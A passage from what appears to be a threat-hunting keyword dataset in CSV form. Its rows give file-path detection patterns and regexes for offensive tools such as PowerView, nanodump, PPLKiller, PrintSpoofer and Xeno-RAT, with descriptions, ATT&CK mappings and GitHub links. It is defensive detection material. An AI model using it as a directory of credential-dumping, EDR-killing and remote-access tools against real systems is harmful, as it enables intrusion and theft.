PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Powerup.ps1*",".{0,1000}\\Powerup\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*\PowerView.cna*",".{0,1000}\\PowerView\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" 
"*\PowerView.exe*",".{0,1000}\\PowerView\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\Powerview.exe*",".{0,1000}\\Powerview\.exe.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*\PowerView3.*",".{0,1000}\\PowerView3\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*\ppid_spoofing.exe*",".{0,1000}\\ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ppl_dump.*",".{0,1000}\\ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*\PPLBlade-main*",".{0,1000}\\PPLBlade\-main.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*\PPLFault*",".{0,1000}\\PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*\PPLKiller*",".{0,1000}\\PPLKiller.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","9","815","130","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*\PPLmedic.cpp*",".{0,1000}\\PPLmedic\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" 
"*\PPLmedic.exe*",".{0,1000}\\PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\PPLmedic\PPLmedic*",".{0,1000}\\PPLmedic\\PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\prefetch_leak.h*",".{0,1000}\\prefetch_leak\.h.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*\prefetch_tool.sln*",".{0,1000}\\prefetch_tool\.sln.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*\prefetch_tool.vcxproj*",".{0,1000}\\prefetch_tool\.vcxproj.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*\printerbug.py*",".{0,1000}\\printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - 
T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\printernightmare.ps1*",".{0,1000}\\printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*\printnightmare.py*",".{0,1000}\\printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\PrintSpoofer.cs*",".{0,1000}\\PrintSpoofer\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\PrintSpoofer.csproj*",".{0,1000}\\PrintSpoofer\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" 
"*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\PrintSpoofer-1.0.zip*",".{0,1000}\\PrintSpoofer\-1\.0\.zip.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1730","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*\PrivEditor\*",".{0,1000}\\PrivEditor\\.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*\privesc.ps1*",".{0,1000}\\privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*\PrivescCheck*",".{0,1000}\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\PrivescCheck.ps1*",".{0,1000}\\PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*\Privesc-master*",".{0,1000}\\Privesc\-master.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "*\privexchange.py*",".{0,1000}\\privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\PrivKit\*",".{0,1000}\\PrivKit\\.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple
beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*\procdump.py*",".{0,1000}\\procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\process_killer.cpp*",".{0,1000}\\process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*\ProcessDLLHijack.cs*",".{0,1000}\\ProcessDLLHijack\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*\processinjection.exe*",".{0,1000}\\processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ProcessSpoofing.h*",".{0,1000}\\ProcessSpoofing\.h.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","10","3","254","46","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z" "*\ProcProtectClient.exe*",".{0,1000}\\ProcProtectClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\ProduKey.exe*",".{0,1000}\\ProduKey\.exe.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. 
or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\Program Files (x86)\KidLogger*",".{0,1000}\\Program\sFiles\s\(x86\)\\KidLogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\asrephashes.txt*",".{0,1000}\\ProgramData\\asrephashes\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\ProgramData\shares.txt*",".{0,1000}\\ProgramData\\shares\.txt.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Programs\StartUp\XenoUpdateManager*",".{0,1000}\\Programs\\StartUp\\XenoUpdateManager.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\ps2exe.ps1*",".{0,1000}\\ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\PS2EXE\*.ps1*",".{0,1000}\\PS2EXE\\.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\PsExecLog.log*",".{0,1000}\\PsExecLog\.log.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation 
tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*\PSexecutionPolicy.bat*",".{0,1000}\\PSexecutionPolicy\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embedded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*\psgetsys.ps1*",".{0,1000}\\psgetsys\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 -
T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\PSLessExec.exe*",".{0,1000}\\PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\pspasswd.exe*",".{0,1000}\\pspasswd\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\pspasswd64.exe*",".{0,1000}\\pspasswd64\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
